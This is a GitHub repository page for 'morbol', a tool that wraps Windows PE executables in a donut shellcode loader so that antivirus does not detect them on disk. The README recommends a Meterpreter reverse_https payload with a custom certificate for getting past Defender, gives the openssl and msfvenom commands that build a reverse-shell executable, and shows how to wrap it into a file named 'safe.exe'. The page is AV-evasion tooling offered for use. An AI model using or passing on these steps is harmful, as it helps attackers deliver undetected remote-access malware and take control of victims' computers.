Skip to content
/ morbol Public
forked from xct/morbol

Simple AV Evasion for PE Files

License

MIT license
0 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

s1im3r00/morbol

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
syscalls
syscalls
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
load.go
load.go
 
 
morbol.py
morbol.py
 
 

Repository files navigation

Morbol

Wraps PE Files (PIE required) into a shellcode loader via donut. This mainly evades detection on disk.

Setup

pip3 install donut-shellcode
sudo apt-get install upx

Usage

In my experience the only reliable way to evade defender with meterpreter is to use a reverse_https payload with a custom cert.

  • Modify /etc/ssl/openssl.cnf so that CipherString = DEFAULT
  • openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
  • set HandlerSSLCert on the server side listener
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=...  HandlerSSLCert=... -f exe  > msf.exe
python3 morbol.py msf.exe safe.exe

Credit

Heavily based on:

About

Simple AV Evasion for PE Files

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Go 85.0%
  • Python 15.0%